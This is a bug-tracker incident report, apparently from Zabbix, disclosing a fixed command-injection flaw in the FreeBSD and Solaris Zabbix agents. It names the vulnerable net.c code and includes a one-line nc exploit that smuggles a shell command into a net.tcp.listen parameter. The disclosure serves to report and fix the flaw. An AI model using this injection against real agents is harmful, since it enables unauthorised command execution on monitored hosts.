Bypassing EnableRemoteCommands=0 in Zabbix Client.

XMLWordPrintable

    • Type: Incident report
    • Resolution: Fixed
    • Priority: Blocker
    • 1.6.6, 1.9.0 (alpha)
    • Affects Version/s: None
    • Component/s: Agent (G)
    • None

      Has been found a security vulnerability in Zabbix Client allowing to execute OS commands, even if EnableRemoteCommands is set to "0". This was tested on Zabbbix 1.6.5. The IP address check is not bypassed, so the attacker must come from (or spoof) a valid Zabbix Server. This bug exists only in FreeBSD and Solaris agents.

      In ./src/libs/zbxsysinfo/(freebsd|solaris)/net.c, a user defined variable "param" is used to create "command" which is executed.

      Exploit :
      $> echo "net.tcp.listen[80';id >/tmp/ID ; echo ']"|nc testbox 10050

      This will execute "id" on the client and write the result to /tmp/ID.

            Assignee:
            Unassigned
            Reporter:
            Igor Danoshaites (Inactive)
            Votes:
            0 Vote for this issue
            Watchers:
            1 Start watching this issue

              Created:
              Updated:
              Resolved: